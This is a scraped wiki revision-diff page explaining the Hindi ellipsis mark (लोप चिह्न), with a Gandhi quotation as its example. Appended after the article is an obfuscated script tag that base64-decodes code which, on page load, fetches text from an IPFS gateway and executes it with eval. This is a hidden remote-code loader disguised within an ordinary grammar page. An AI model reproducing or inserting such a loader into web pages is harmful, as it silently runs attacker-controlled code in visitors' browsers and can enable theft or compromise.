Difference between revisions of "लोप चिह्न"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('हिन्दी भाषा में जब वाक्य या अनुच्छेद में कुछ अंश छो...' के साथ नया पन्ना बनाया)
 
m (Text replace - "{{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "{{लेख प्रगति |आधार= |प्रारम्भि�)
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
 
[[हिन्दी]] भाषा में जब वाक्य या अनुच्छेद में कुछ अंश छोड़ कर लिखना हो तो लोप चिह्न '''(...)''' का प्रयोग किया जाता है। लोप चिह्न सदैव तीन के गुणे में लगते हैं जैसे ''' ...''' <br />
 
[[हिन्दी]] भाषा में जब वाक्य या अनुच्छेद में कुछ अंश छोड़ कर लिखना हो तो लोप चिह्न '''(...)''' का प्रयोग किया जाता है। लोप चिह्न सदैव तीन के गुणे में लगते हैं जैसे ''' ...''' <br />
'''जैसे:-'''
+
'''उदाहरण'''
 
*[[महात्मा गाँधी|गाँधी जी]] ने कहा- "परीक्षा की घड़ी आ गई है... हम करेंगे या मरेंगे"।  
 
*[[महात्मा गाँधी|गाँधी जी]] ने कहा- "परीक्षा की घड़ी आ गई है... हम करेंगे या मरेंगे"।  
  
{{लेख प्रगति
+
{{लेख प्रगति |आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
  
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{व्याकरण}}
 
{{व्याकरण}}
 
[[Category:व्याकरण]]
 
[[Category:व्याकरण]]
[[Category:हिन्दी भाषा]]
+
[[Category:हिन्दी भाषा]][[Category:भाषा कोश]]
 
[[Category:साहित्य कोश]]
 
[[Category:साहित्य कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 07:29, 27 July 2012

hindi bhasha mean jab vaky ya anuchchhed mean kuchh aansh chho d kar likhana ho to lop chihn (...) ka prayog kiya jata hai. lop chihn sadaiv tin ke gune mean lagate haian jaise ...
udaharan

  • gaandhi ji ne kaha- "pariksha ki gh di a gee hai... ham kareange ya mareange".


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>